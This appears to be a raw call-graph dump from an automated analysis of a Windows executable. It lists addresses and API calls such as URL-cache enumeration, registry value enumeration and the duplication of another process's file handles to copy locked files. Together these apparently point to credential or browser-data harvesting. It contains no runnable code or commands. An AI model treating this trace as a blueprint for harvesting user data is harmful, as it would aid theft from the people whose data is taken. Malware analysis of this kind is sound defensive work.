409d1f 6 API calls 38635->38636 38637 40ae49 38636->38637 38637->38342 38639 40ade0 38638->38639 38642 40ae0f 38638->38642 38640 40ade7 wcscmp 38639->38640 38639->38642 38641 40adfe wcscmp 38640->38641 38640->38642 38641->38642 38642->38342 38644 40ae18 9 API calls 38643->38644 38650 4453c4 38644->38650 38645 40ae51 9 API calls 38645->38650 38646 4453f3 38648 40aebe FindClose 38646->38648 38647 40add4 2 API calls 38647->38650 38649 4453fe 38648->38649 38649->38342 38650->38645 38650->38646 38650->38647 38651 445403 250 API calls 38650->38651 38651->38650 38653 40ae7b FindNextFileW 38652->38653 38654 40ae5c FindFirstFileW 38652->38654 38655 40ae94 38653->38655 38656 40ae8f 38653->38656 38654->38655 38658 40aeb6 38655->38658 38659 409d1f 6 API calls 38655->38659 38657 40aebe FindClose 38656->38657 38657->38655 38658->38342 38659->38658 38660->38226 38661->38206 38662->38295 38663->38283 38664->38283 38665->38314 38667 409c89 38666->38667 38667->38333 38668->38365 38670 413d39 38669->38670 38671 413d2f FreeLibrary 38669->38671 38672 40b633 free 38670->38672 38671->38670 38673 413d42 38672->38673 38674 40b633 free 38673->38674 38675 413d4a 38674->38675 38675->38267 38676->38202 38677->38192 38678->38269 38680 44db70 38679->38680 38681 40b6fc memset 38680->38681 38682 409c70 2 API calls 38681->38682 38683 40b732 wcsrchr 38682->38683 38684 40b743 38683->38684 38685 40b746 memset 38683->38685 38684->38685 38686 40b2cc 27 API calls 38685->38686 38687 40b76f 38686->38687 38688 409d1f 6 API calls 38687->38688 38689 40b783 38688->38689 39485 409b98 GetFileAttributesW 38689->39485 38691 40b7c2 39486 40bb98 38691->39486 38692 40b792 38692->38691 38693 409c70 2 API calls 38692->38693 38695 40b7a5 38693->38695 38697 40b2cc 27 API calls 38695->38697 38700 40b7b2 38697->38700 38698 40b837 CloseHandle 38702 40b83e memset 38698->38702 38699 40b817 39520 409a45 GetTempPathW 38699->39520 38704 409d1f 6 API calls 38700->38704 39519 40a6e6 WideCharToMultiByte 38702->39519 38704->38691 38705 40b827 38705->38702 38706 40b866 38707 444432 120 API calls 38706->38707 38708 40b879 38707->38708 38709 40bad5 38708->38709 38710 40b273 27 API calls 38708->38710 38712 40b04b ??3@YAXPAX 38709->38712 38711 40b89a 38710->38711 38713 438552 133 API calls 38711->38713 38714 40baf3 38712->38714 38715 40b8a4 38713->38715 38714->38194 38716 40bacd 38715->38716 38718 4251c4 136 API calls 38715->38718 38717 443d90 110 API calls 38716->38717 38717->38709 38740 40b8b8 38718->38740 38719 40bac6 39532 424f26 122 API calls 38719->39532 38720 40b8bd memset 39523 425413 17 API calls 38720->39523 38723 425413 17 API calls 38723->38740 38726 40a71b MultiByteToWideChar 38726->38740 38729 40b9b5 memcmp 38729->38740 38730 4099c6 2 API calls 38730->38740 38731 404423 37 API calls 38731->38740 38733 4251c4 136 API calls 38733->38740 38734 40bb3e memset memcpy 39533 40a734 MultiByteToWideChar 38734->39533 38737 40bb88 LocalFree 38737->38740 38740->38719 38740->38720 38740->38723 38740->38726 38740->38729 38740->38730 38740->38731 38740->38733 38740->38734 38741 40ba5f memcmp 38740->38741 38742 40a734 MultiByteToWideChar 38740->38742 39524 4253ef 16 API calls 38740->39524 39525 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38740->39525 39526 4253af 17 API calls 38740->39526 39527 4253cf 17 API calls 38740->39527 39528 447280 memset 38740->39528 39529 447960 memset memcpy memcpy memcpy 38740->39529 39530 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38740->39530 39531 447920 memcpy memcpy memcpy 38740->39531 38741->38740 38742->38740 38743->38272 38745 40aed1 38744->38745 38746 40aec7 FindClose 38744->38746 38745->38209 38746->38745 38748 4099d7 38747->38748 38749 4099da memcpy 38747->38749 38748->38749 38749->38255 38751 40b2cc 27 API calls 38750->38751 38752 44543f 38751->38752 38753 409d1f 6 API calls 38752->38753 38754 44544f 38753->38754 39622 409b98 GetFileAttributesW 38754->39622 38756 44545e 38757 445476 38756->38757 38758 40b6ef 249 API calls 38756->38758 38759 40b2cc 27 API calls 38757->38759 38758->38757 38760 445482 38759->38760 38761 409d1f 6 API calls 38760->38761 38762 445492 38761->38762 39623 409b98 GetFileAttributesW 38762->39623 38764 4454a1 38765 4454b9 38764->38765 38766 40b6ef 249 API calls 38764->38766 38765->38281 38766->38765 38767->38280 38768->38305 38769->38307 38770->38345 38771->38326 38772->38372 38773->38372 38774->38355 38775->38384 38776->38386 38777->38388 38779 414c2e 14 API calls 38778->38779 38780 40c2ae 38779->38780 38834 40c1d3 38780->38834 38785 40c3be 38802 40a8ab 38785->38802 38786 40afcf 2 API calls 38787 40c2fd FindFirstUrlCacheEntryW 38786->38787 38788 40c3b6 38787->38788 38789 40c31e wcschr 38787->38789 38790 40b04b ??3@YAXPAX 38788->38790 38791 40c331 38789->38791 38792 40c35e FindNextUrlCacheEntryW 38789->38792 38790->38785 38794 40a8ab 9 API calls 38791->38794 38792->38789 38793 40c373 GetLastError 38792->38793 38795 40c3ad FindCloseUrlCache 38793->38795 38796 40c37e 38793->38796 38797 40c33e wcschr 38794->38797 38795->38788 38798 40afcf 2 API calls 38796->38798 38797->38792 38799 40c34f 38797->38799 38800 40c391 FindNextUrlCacheEntryW 38798->38800 38801 40a8ab 9 API calls 38799->38801 38800->38789 38800->38795 38801->38792 38950 40a97a 38802->38950 38805 40a8cc 38805->38395 38956 40b1ab free free 38807->38956 38809 40c3dd 38810 40b2cc 27 API calls 38809->38810 38811 40c3e7 38810->38811 38812 40c50e 38811->38812 38813 40c3ff 38811->38813 38827 405337 38812->38827 38814 40a9ce 4 API calls 38813->38814 38815 40c418 memset 38814->38815 38957 40aa1d 38815->38957 38818 40c471 38820 40c47a _wcsupr 38818->38820 38819 40c505 38819->38812 38959 40a8d0 7 API calls 38820->38959 38822 40c498 38960 40a8d0 7 API calls 38822->38960 38824 40c4ac memset 38825 40aa1d 38824->38825 38826 40c4e4 RegEnumValueW 38825->38826 38826->38819 38826->38820 38961 405220 38827->38961 38830->38406 38831->38408 38832->38409 38833->38402 38835 40ae18 9 API calls 38834->38835 38841 40c210 38835->38841 38836 40ae51 9 API calls 38836->38841 38837 40c264 38838 40aebe FindClose 38837->38838 38840 40c26f 38838->38840 38839 40add4 2 API calls 38839->38841 38846 40e5ed memset memset 38840->38846 38841->38836 38841->38837 38841->38839 38842 40c231 _wcsicmp 38841->38842 38843 40c1d3 34 API calls 38841->38843 38842->38841 38844 40c248 38842->38844 38843->38841 38859 40c084 21 API calls 38844->38859 38847 414c2e 14 API calls 38846->38847 38848 40e63f 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 40e658 38849->38850 38860 409b98 GetFileAttributesW 38850->38860 38852 40e667 38853 409d1f 6 API calls 38852->38853 38855 40e680 38852->38855 38853->38855 38861 409b98 GetFileAttributesW 38855->38861 38856 40e68f 38857 40c2d8 38856->38857 38862 40e4b2 38856->38862 38857->38785 38857->38786 38859->38841 38860->38852 38861->38856 38883 40e01e 38862->38883 38864 40e593 38866 40e5b0 38864->38866 38867 40e59c DeleteFileW 38864->38867 38865 40e521 38865->38864 38906 40e175 38865->38906 38868 40b04b ??3@YAXPAX 38866->38868 38867->38866 38869 40e5bb 38868->38869 38871 40e5c4 CloseHandle 38869->38871 38872 40e5cc 38869->38872 38871->38872 38874 40b633 free 38872->38874 38873 40e573 38875 40e584 38873->38875 38876 40e57c CloseHandle 38873->38876 38877 40e5db 38874->38877 38949 40b1ab free free 38875->38949 38876->38875 38880 40b633 free 38877->38880 38879 40e540 38879->38873 38926 40e2ab 38879->38926 38881 40e5e3 38880->38881 38881->38857 38884 406214 22 API calls 38883->38884 38885 40e03c 38884->38885 38886 40e16b 38885->38886 38887 40dd85 74 API calls 38885->38887 38886->38865 38888 40e06b 38887->38888 38888->38886 38889 40afcf ??2@YAPAXI ??3@YAXPAX 38888->38889 38890 40e08d OpenProcess 38889->38890 38891 40e0a4 GetCurrentProcess DuplicateHandle 38890->38891 38895 40e152 38890->38895 38892 40e0d0 GetFileSize 38891->38892 38893 40e14a CloseHandle 38891->38893 38896 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38892->38896 38893->38895 38894 40e160 38898 40b04b ??3@YAXPAX 38894->38898 38895->38894 38897 406214 22 API calls 38895->38897 38899 40e0ea 38896->38899 38897->38894 38898->38886 38900 4096dc CreateFileW 38899->38900 38901 40e0f1 CreateFileMappingW 38900->38901 38902 40e140 CloseHandle CloseHandle 38901->38902 38903 40e10b MapViewOfFile 38901->38903 38902->38893 38904 40e13b CloseHandle 38903->38904 38905 40e11f WriteFile UnmapViewOfFile 38903->38905 38904->38902 38905->38904 38907 40e18c 38906->38907 38908 406b90 11 API calls 38907->38908 38909 40e19f 38908->38909 38910 40e1a7 memset 38909->38910 38911 40e299 38909->38911 38916 40e1e8 38910->38916 38912 4069a3 ??3@YAXPAX free 38911->38912 38913 40e2a4 38912->38913 38913->38879 38914 406e8f 13 API calls 38914->38916 38915 406b53 SetFilePointerEx ReadFile 38915->38916 38916->38914 38916->38915 38917 40dd50 _wcsicmp 38916->38917 38918 40e283 38916->38918 38922 40742e 8 API calls 38916->38922 38923 40aae3 wcslen wcslen _memicmp 38916->38923 38924 40e244 _snwprintf 38916->38924 38917->38916 38919 40e291 38918->38919 38920 40e288 free 38918->38920 38921 40aa04 free 38919->38921 38920->38919 38921->38911 38922->38916 38923->38916 38925 40a8d0 7 API calls 38924->38925 38925->38916 38927 40e2c2 38926->38927 38928 406b90 11 API calls 38927->38928 38944 40e2d3 38928->38944 38929 40e4a0 38930 4069a3 ??3@YAXPAX free 38929->38930 38931 40e4ab 38930->38931 38931->38879 38932 406e8f 13 API calls 38932->38944 38933 406b53 SetFilePointerEx ReadFile 38933->38944 38934 40e489 38935 40aa04 free 38934->38935 38936 40e491 38935->38936 38936->38929 38937 40e497 free 38936->38937 38937->38929 38938 40dd50 _wcsicmp 38938->38944 38939 40dd50 _wcsicmp 38940 40e376 memset 38939->38940 38941 40aa29 6 API calls 38940->38941 38941->38944 38942 40742e 8 API calls 38942->38944 38943 40e3e0 memcpy 38943->38944 38944->38929 38944->38932 38944->38933 38944->38934 38944->38938 38944->38939 38944->38942 38944->38943 38945 40e3b3 wcschr 38944->38945 38946 40e3fb memcpy 38944->38946 38947 40e416 memcpy 38944->38947 38948 40e431 memcpy 38944->38948 38945->38944 38946->38944 38947->38944 38948->38944 38949->38864 38953 40a980 38950->38953 38951 40a995 _wcsicmp 38951->38953 38952 40a99c wcscmp 38952->38953 38953->38951 38953->38952 38954 40a8bb 38953->38954 38954->38805 38955 40a8d0 7 API calls 38954->38955 38955->38805 38956->38809 38958 40aa23 RegEnumValueW 38957->38958 38958->38818 38958->38819 38959->38822 38960->38824 38962 405335 38961->38962 38963 40522a 38961->38963 38962->38409 38964 40b2cc 27 API calls 38963->38964 38965 405234 38964->38965 38966 40a804 8 API calls 38965->38966 38967 40523a 38966->38967 39006 40b273 38967->39006 38969 405248 _mbscpy _mbscat GetProcAddress 38970 40b273 27 API calls 38969->38970 38971 405279 38970->38971 39009 405211 GetProcAddress 38971->39009 38973 405282 38974 40b273 27 API calls 38973->38974 38975 40528f 38974->38975 39010 405211 GetProcAddress 38975->39010 38977 405298 38978 40b273 27 API calls 38977->38978 38979 4052a5 38978->38979 39011 405211 GetProcAddress 38979->39011 38981 4052ae 38982 40b273 27 API calls 38981->38982 38983 4052bb 38982->38983 39012 405211 GetProcAddress 38983->39012 38985 4052c4 38986 40b273 27 API calls 38985->38986 38987 4052d1 38986->38987 39013 405211 GetProcAddress 38987->39013 38989 4052da 38990 40b273 27 API calls 38989->38990 38991 4052e7 38990->38991 39014 405211 GetProcAddress 38991->39014 38993 4052f0 38994 40b273 27 API calls 38993->38994 38995 4052fd 38994->38995 39015 405211 GetProcAddress 38995->39015 38997 405306 38998 40b273 27 API calls 38997->38998 38999 405313 38998->38999 39016 405211 GetProcAddress 38999->39016 39001 40531c 39002 40b273 27 API calls 39001->39002 39003 405329 39002->39003 39017 405211 GetProcAddress 39003->39017 39005 405332 39005->38962 39007 40b58d 27 API calls 39006->39007 39008 40b18c 39007->39008 39008->38969 39009->38973 39010->38977 39011->38981 39012->38985 39013->38989 39014->38993 39015->38997 39016->39001 39017->39005 39019 40440c FreeLibrary 39018->39019 39020 40436d 39019->39020 39021 40a804 8 API calls 39020->39021 39022 404377 39021->39022 39023 404383 39022->39023 39024 404405 39022->39024 39025 40b273 27 API calls 39023->39025 39024->38414 39024->38416 39024->38417 39026 40438d GetProcAddress 39025->39026 39027 40b273 27 API calls 39026->39027 39028 4043a7 GetProcAddress 39027->39028 39029 40b273 27 API calls 39028->39029 39030 4043ba GetProcAddress 39029->39030 39031 40b273 27 API calls 39030->39031 39032 4043ce GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 4043e2 GetProcAddress 39033->39034 39035 4043f1 39034->39035 39036 4043f7 39035->39036 39037 40440c FreeLibrary 39035->39037 39036->39024 39037->39024 39039 404413 FreeLibrary 39038->39039 39040 40441e 39038->39040 39039->39040 39040->38431 39041->38427 39043 40442e 39042->39043 39044 40447e 39042->39044 39045 40b2cc 27 API calls 39043->39045 39044->38427 39046 404438 39045->39046 39047 40a804 8 API calls 39046->39047 39048 40443e 39047->39048 39049 404445 39048->39049 39050 404467 39048->39050 39051 40b273 27 API calls 39049->39051 39050->39044 39053 404475 FreeLibrary 39050->39053 39052 40444f GetProcAddress 39051->39052 39052->39050 39054 404460 39052->39054 39053->39044 39054->39050 39056 4135f6 39055->39056 39057 4135eb FreeLibrary 39055->39057 39056->38434 39057->39056 39059 4449c4 39058->39059 39060 444a52 39058->39060 39061 40b2cc 27 API calls 39059->39061 39060->38451 39060->38456 39062 4449cb 39061->39062 39063 40a804 8 API calls 39062->39063 39064 4449d1 39063->39064 39065 40b273 27 API calls 39064->39065 39066 4449dc GetProcAddress 39065->39066 39067 40b273 27 API calls 39066->39067 39068 4449f3 GetProcAddress 39067->39068 39069 40b273 27 API calls 39068->39069 39070 444a04 GetProcAddress 39069->39070 39071 40b273 27 API calls 39070->39071 39072 444a15 GetProcAddress 39071->39072 39073 40b273 27 API calls 39072->39073 39074 444a26 GetProcAddress 39073->39074 39075 40b273 27 API calls 39074->39075 39076 444a37 GetProcAddress 39075->39076 39077 40b273 27 API calls 39076->39077 39078 444a48 GetProcAddress 39077->39078 39078->39060 39079->38462 39080->38462 39081->38462 39082->38462 39083->38452 39085 403a29 39084->39085 39099 403bed memset memset 39085->39099 39087 403ae7 39112 40b1ab free free 39087->39112 39088 403a3f memset 39093 403a2f 39088->39093 39090 403aef 39090->38470 39091 40a8d0 7 API calls 39091->39093 39092 409d1f 6 API calls 39092->39093 39093->39087 39093->39088 39093->39091 39093->39092 39094 409b98 GetFileAttributesW 39093->39094 39094->39093 39096 40a051 GetFileTime CloseHandle 39095->39096 39097 4039ca CompareFileTime 39095->39097 39096->39097 39097->38470 39098->38469 39100 414c2e 14 API calls 39099->39100 39101 403c38 39100->39101 39102 409719 2 API calls 39101->39102 39103 403c3f wcscat 39102->39103 39104 414c2e 14 API calls 39103->39104 39105 403c61 39104->39105 39106 409719 2 API calls 39105->39106 39107 403c68 wcscat 39106->39107 39113 403af5 39107->39113 39110 403af5 20 API calls 39111 403c95 39110->39111 39111->39093 39112->39090 39114 403b02 39113->39114 39115 40ae18 9 API calls 39114->39115 39123 403b37 39115->39123 39116 403bdb 39117 40aebe FindClose 39116->39117 39118 403be6 39117->39118 39118->39110 39119 40ae18 9 API calls 39119->39123 39120 40ae51 9 API calls 39120->39123 39121 40aebe FindClose 39121->39123 39122 40add4 wcscmp wcscmp 39122->39123 39123->39116 39123->39119 39123->39120 39123->39121 39123->39122 39124 40a8d0 7 API calls 39123->39124 39124->39123 39126 409d1f 6 API calls 39125->39126 39127 404190 39126->39127 39140 409b98 GetFileAttributesW 39127->39140 39129 40419c 39130 4041a7 6 API calls 39129->39130 39131 40435c 39129->39131 39132 40424f 39130->39132 39131->38496 39132->39131 39134 40425e memset 39132->39134 39136 409d1f 6 API calls 39132->39136 39137 40a8ab 9 API calls 39132->39137 39141 414842 39132->39141 39134->39132 39135 404296 wcscpy 39134->39135 39135->39132 39136->39132 39138 4042b6 memset memset _snwprintf wcscpy 39137->39138 39138->39132 39139->38494 39140->39129 39144 41443e 39141->39144 39143 414866 39143->39132 39145 41444b 39144->39145 39146 414451 39145->39146 39147 4144a3 GetPrivateProfileStringW 39145->39147 39148 414491 39146->39148 39149 414455 wcschr 39146->39149 39147->39143 39151 414495 WritePrivateProfileStringW 39148->39151 39149->39148 39150 414463 _snwprintf 39149->39150 39150->39151 39151->39143 39152->38500 39154 40b2cc 27 API calls 39153->39154 39155 409615 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 409625 39156->39157 39182 409b98 GetFileAttributesW 39157->39182 39159 409634 39160 409648 39159->39160 39183 4091b8 memset 39159->39183 39161 40b2cc 27 API calls 39160->39161 39164 408801 39160->39164 39163 40965d 39161->39163 39165 409d1f 6 API calls 39163->39165 39164->38503 39164->38530 39166 40966d 39165->39166 39235 409b98 GetFileAttributesW 39166->39235 39168 40967c 39168->39164 39169 409681 39168->39169 39236 409529 72 API calls 39169->39236 39171 409690 39171->39164 39172->38525 39173->38530 39174->38531 39175->38530 39176->38536 39177->38537 39178->38541 39182->39159 39237 40a6e6 WideCharToMultiByte 39183->39237 39185 409202 39238 444432 39185->39238 39188 40b273 27 API calls 39189 409236 39188->39189 39284 438552 39189->39284 39192 409383 39194 40b273 27 API calls 39192->39194 39196 409399 39194->39196 39195 409254 39197 40937b 39195->39197 39305 4253cf 17 API calls 39195->39305 39198 438552 133 API calls 39196->39198 39309 424f26 122 API calls 39197->39309 39217 4093a3 39198->39217 39201 409267 39306 4253cf 17 API calls 39201->39306 39202 4094ff 39313 443d90 39202->39313 39205 4251c4 136 API calls 39205->39217 39206 409273 39307 4253af 17 API calls 39206->39307 39207 409507 39215 40951d 39207->39215 39333 408f2f 77 API calls 39207->39333 39209 4093df 39312 424f26 122 API calls 39209->39312 39211 4253cf 17 API calls 39211->39217 39215->39160 39217->39202 39217->39205 39217->39209 39217->39211 39219 4093e4 39217->39219 39310 4253af 17 API calls 39219->39310 39225 4093ed 39311 4253af 17 API calls 39225->39311 39228 4093f9 39228->39209 39229 409409 memcmp 39228->39229 39229->39209 39230 409421 memcmp 39229->39230 39231 4094a4 memcmp 39230->39231 39232 409435 39230->39232 39231->39209 39234 4094b8 memcpy memcpy 39231->39234 39232->39209 39233 409442 memcpy memcpy memcpy 39232->39233 39233->39209 39234->39209 39235->39168 39236->39171 39237->39185 39334 4438b5 39238->39334 39240 44444c 39241 409215 39240->39241 39348 415a6d 39240->39348 39241->39188 39241->39215 39244 444486 39246 4444b9 memcpy 39244->39246 39283 4444a4 39244->39283 39245 44469e 39245->39241 39248 443d90 110 API calls 39245->39248 39352 415258 39246->39352 39248->39241 39249 444524 39250 444541 39249->39250 39251 44452a 39249->39251 39355 444316 39250->39355 39389 416935 39251->39389 39255 444316 18 API calls 39256 444563 39255->39256 39257 444316 18 API calls 39256->39257 39258 44456f 39257->39258 39259 444316 18 API calls 39258->39259 39260 44457f 39259->39260 39260->39283 39369 432d4e 39260->39369 39263 444316 18 API calls 39264 4445b0 39263->39264 39373 41eed2 39264->39373 39402 4442e6 11 API calls 39283->39402 39403 438460 39284->39403 39286 409240 39286->39192 39287 4251c4 39286->39287 39415 424f07 39287->39415 39289 4251e4 39290 4251f7 39289->39290 39291 4251e8 39289->39291 39423 4250f8 39290->39423 39422 4446ea 11 API calls 39291->39422 39293 4251f2 39293->39195 39295 425209 39298 425249 39295->39298 39301 4250f8 126 API calls 39295->39301 39302 425287 39295->39302 39431 4384e9 134 API calls 39295->39431 39432 424f74 123 API calls 39295->39432 39298->39302 39433 424ff0 13 API calls 39298->39433 39301->39295 39435 415c7d 16 API calls 39302->39435 39303 425266 39303->39302 39434 415be9 memcpy 39303->39434 39305->39201 39306->39206 39309->39192 39310->39225 39311->39228 39312->39202 39314 443da3 39313->39314 39315 443db6 39313->39315 39436 41707a 11 API calls 39314->39436 39315->39207 39317 443da8 39318 443dbc 39317->39318 39319 443dac 39317->39319 39438 4300e8 memset memset memcpy 39318->39438 39437 4446ea 11 API calls 39319->39437 39322 443dce 39324 443de0 39322->39324 39326 443e22 39322->39326 39323 416935 16 API calls 39323->39315 39324->39323 39325 443e5a 39326->39325 39439 41f0ac 102 API calls 39326->39439 39333->39215 39335 4438d0 39334->39335 39344 4438c9 39334->39344 39336 415378 memcpy memcpy 39335->39336 39337 4438d5 39336->39337 39338 4154e2 10 API calls 39337->39338 39339 443906 39337->39339 39337->39344 39338->39339 39340 443970 memset 39339->39340 39339->39344 39343 44398b 39340->39343 39341 4439a0 39342 415700 10 API calls 39341->39342 39341->39344 39346 4439c0 39342->39346 39343->39341 39345 41975c 10 API calls 39343->39345 39344->39240 39345->39341 39346->39344 39347 418981 10 API calls 39346->39347 39347->39344 39349 415a77 39348->39349 39350 415a8d 39349->39350 39351 415a7e memset 39349->39351 39350->39244 39351->39350 39353 4438b5 11 API calls 39352->39353 39354 41525d 39353->39354 39354->39249 39356 444328 39355->39356 39357 444423 39356->39357 39358 44434e 39356->39358 39360 4446ea 11 API calls 39357->39360 39359 432d4e memset memset memcpy 39358->39359 39361 44435a 39359->39361 39366 444381 39360->39366 39363 444375 39361->39363 39368 44438b 39361->39368 39362 432d4e memset memset memcpy 39364 4443ec 39362->39364 39365 416935 16 API calls 39363->39365 39364->39366 39367 416935 16 API calls 39364->39367 39365->39366 39366->39255 39367->39366 39368->39362 39370 432d65 39369->39370 39371 432d58 39369->39371 39370->39263 39372 432cc4 memset memset memcpy 39371->39372 39372->39370 39390 41693e 39389->39390 39394 41698e 39389->39394 39391 41694c 39390->39391 39392 422fd1 memset 39390->39392 39393 4165a0 11 API calls 39391->39393 39391->39394 39392->39391 39395 416972 39393->39395 39394->39283 39395->39394 39396 422b84 15 API calls 39395->39396 39396->39394 39402->39245 39404 41703f 11 API calls 39403->39404 39405 43847a 39404->39405 39406 43848a 39405->39406 39407 43847e 39405->39407 39409 438270 133 API calls 39406->39409 39408 4446ea 11 API calls 39407->39408 39411 438488 39408->39411 39410 4384aa 39409->39410 39410->39411 39412 424f26 122 API calls 39410->39412 39411->39286 39413 4384bb 39412->39413 39414 438270 133 API calls 39413->39414 39414->39411 39416 424f1f 39415->39416 39417 424f0c 39415->39417 39419 424eea 11 API calls 39416->39419 39418 416760 11 API calls 39417->39418 39420 424f18 39418->39420 39421 424f24 39419->39421 39420->39289 39421->39289 39422->39293 39424 425108 39423->39424 39430 42510d 39423->39430 39425 424f74 123 API calls 39424->39425 39425->39430 39426 42569b 124 API calls 39427 42516e 39426->39427 39429 415c7d 16 API calls 39427->39429 39428 425115 39428->39295 39429->39428 39430->39426 39430->39428 39431->39295 39432->39295 39433->39303 39434->39302 39435->39293 39436->39317 39437->39315 39438->39322 39439->39326 39470 413f4f 39442->39470 39445 413f37 K32GetModuleFileNameExW 39446 413f4a 39445->39446 39446->38564 39448 413969 wcscpy 39447->39448 39449 41396c wcschr 39447->39449 39461 413a3a 39448->39461 39449->39448 39451 41398e 39449->39451 39475 4097f7 wcslen wcslen _memicmp 39451->39475 39453 41399a 39454 4139a4 memset 39453->39454 39455 4139e6 39453->39455 39476 409dd5 GetWindowsDirectoryW wcscpy 39454->39476 39457 413a31 wcscpy 39455->39457 39458 4139ec memset 39455->39458 39457->39461 39477 409dd5 GetWindowsDirectoryW wcscpy 39458->39477 39459 4139c9 wcscpy wcscat 39459->39461 39461->38564 39462 413a11 memcpy wcscat 39462->39461 39464 413cb0 GetModuleHandleW 39463->39464 39465 413cda 39463->39465 39464->39465 39466 413cbf GetProcAddress 39464->39466 39467 413ce3 GetProcessTimes 39465->39467 39468 413cf6 39465->39468 39466->39465 39467->38566 39468->38566 39469->38560 39471 413f2f 39470->39471 39472 413f54 39470->39472 39471->39445 39471->39446 39473 40a804 8 API calls 39472->39473 39474 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39473->39474 39474->39471 39475->39453 39476->39459 39477->39462 39478->38586 39479->38610 39481 409cf9 GetVersionExW 39480->39481 39482 409d0a 39480->39482 39481->39482 39482->38616 39482->38619 39483->38623 39484->38625 39485->38692 39487 40bba5 39486->39487 39534 40cc26 39487->39534 39490 40bd4b 39555 40cc0c 39490->39555 39495 40b2cc 27 API calls 39496 40bbef 39495->39496 39562 40ccf0 _wcsicmp 39496->39562 39498 40bbf5 39498->39490 39563 40ccb4 6 API calls 39498->39563 39500 40bc26 39501 40cf04 17 API calls 39500->39501 39502 40bc2e 39501->39502 39503 40bd43 39502->39503 39504 40b2cc 27 API calls 39502->39504 39505 40cc0c 4 API calls 39503->39505 39506 40bc40 39504->39506 39505->39490 39564 40ccf0 _wcsicmp 39506->39564 39508 40bc46 39508->39503 39509 40bc61 memset memset WideCharToMultiByte 39508->39509 39565 40103c strlen 39509->39565 39511 40bcc0 39512 40b273 27 API calls 39511->39512 39513 40bcd0 memcmp 39512->39513 39513->39503 39514 40bce2 39513->39514 39515 404423 37 API calls 39514->39515 39516 40bd10 39515->39516 39516->39503 39517 40bd3a LocalFree 39516->39517 39518 40bd1f memcpy 39516->39518 39517->39503 39518->39517 39519->38706 39521 409a74 GetTempFileNameW 39520->39521 39522 409a66 GetWindowsDirectoryW 39520->39522 39521->38705 39522->39521 39523->38740 39524->38740 39525->38740 39526->38740 39527->38740 39528->38740 39529->38740 39530->38740 39531->38740 39532->38716 39533->38737 39566 4096c3 CreateFileW 39534->39566 39536 40cc34 39537 40cc3d GetFileSize 39536->39537 39545 40bbca 39536->39545 39538 40afcf 2 API calls 39537->39538 39539 40cc64 39538->39539 39567 40a2ef ReadFile 39539->39567 39541 40cc71 39568 40ab4a MultiByteToWideChar 39541->39568 39543 40cc95 CloseHandle 39544 40b04b ??3@YAXPAX 39543->39544 39544->39545 39545->39490 39546 40cf04 39545->39546 39547 40b633 free 39546->39547 39548 40cf14 39547->39548 39574 40b1ab free free 39548->39574 39550 40bbdd 39550->39490 39550->39495 39551 40cf1b 39551->39550 39553 40cfef 39551->39553 39575 40cd4b 39551->39575 39554 40cd4b 14 API calls 39553->39554 39554->39550 39556 40b633 free 39555->39556 39557 40cc15 39556->39557 39558 40aa04 free 39557->39558 39559 40cc1d 39558->39559 39621 40b1ab free free 39559->39621 39561 40b7d4 memset CreateFileW 39561->38698 39561->38699 39562->39498 39563->39500 39564->39508 39565->39511 39566->39536 39567->39541 39569 40ab93 39568->39569 39570 40ab6b 39568->39570 39569->39543 39571 40a9ce 4 API calls 39570->39571 39572 40ab74 39571->39572 39573 40ab7c MultiByteToWideChar 39572->39573 39573->39569 39574->39551 39576 40cd7b 39575->39576 39609 40aa29 6 API calls 39576->39609 39578 40cef5 39579 40aa04 free 39578->39579 39580 40cefd 39579->39580 39580->39551 39581 40cd89 39581->39578 39610 40aa29 6 API calls 39581->39610 39583 40ce1d 39611 40aa29 6 API calls 39583->39611 39585 40ce3e 39586 40ce6a 39585->39586 39612 40abb7 wcslen memmove 39585->39612 39587 40ce9f 39586->39587 39615 40abb7 wcslen memmove 39586->39615 39618 40a8d0 7 API calls 39587->39618 39591 40ce56 39613 40aa71 wcslen 39591->39613 39592 40ce8b 39616 40aa71 wcslen 39592->39616 39593 40ceb5 39619 40a8d0 7 API calls 39593->39619 39596 40ce5e 39614 40abb7 wcslen memmove 39596->39614 39597 40ce93 39617 40abb7 wcslen memmove 39597->39617 39601 40cecb 39620 40d00b malloc memcpy free free 39601->39620 39603 40cedd 39604 40aa04 free 39603->39604 39605 40cee5 39604->39605 39606 40aa04 free 39605->39606 39607 40ceed 39606->39607 39608 40aa04 free 39607->39608 39608->39578 39609->39581 39610->39583 39611->39585 39612->39591 39613->39596 39614->39586 39615->39592 39616->39597 39617->39587 39618->39593 39619->39601 39620->39603 39621->39561 39622->38756 39623->38764 37544 44dea5 37545 44deb5 FreeLibrary 37544->37545 37546 44dec3 37544->37546 37545->37546 39633 4148b6 FindResourceW 39634 4148cf SizeofResource 39633->39634 39637 4148f9 39633->39637 39635 4148e0 LoadResource 39634->39635 39634->39637 39636 4148ee LockResource 39635->39636 39635->39637 39636->39637 37720 415304 free 39638 441b3f 39648 43a9f6 39638->39648 39640 441b61 39821 4386af memset 39640->39821 39642 44189a 39643 442bd4 39642->39643 39644 4418e2 39642->39644 39645 4418ea 39643->39645 39823 441409 memset 39643->39823 39644->39645 39822 4414a9 12 API calls 39644->39822 39649 43aa20 39648->39649 39650 43aadf 39648->39650 39649->39650 39651 43aa34 memset 39649->39651 39650->39640 39652 43aa56 39651->39652 39653 43aa4d 39651->39653 39824 43a6e7 39652->39824 39832 42c02e memset 39653->39832 39658 43aad3 39834 4169a7 11 API calls 39658->39834 39659 43aaae 39659->39650 39659->39658 39674 43aae5 39659->39674 39660 43ac18 39663 43ac47 39660->39663 39836 42bbd5 memcpy memcpy memcpy memset memcpy 39660->39836 39664 43aca8 39663->39664 39837 438eed 16 API calls 39663->39837 39668 43acd5 39664->39668 39839 4233ae 11 API calls 39664->39839 39667 43ac87 39838 4233c5 16 API calls 39667->39838 39840 423426 11 API calls 39668->39840 39672 43ace1 39841 439811 162 API calls 39672->39841 39673 43a9f6 160 API calls 39673->39674 39674->39650 39674->39660 39674->39673 39835 439bbb 22 API calls 39674->39835 39676 43acfd 39681 43ad2c 39676->39681 39842 438eed 16 API calls 39676->39842 39678 43ad19 39843 4233c5 16 API calls 39678->39843 39680 43ad58 39844 44081d 162 API calls 39680->39844 39681->39680 39684 43add9 39681->39684 39848 423426 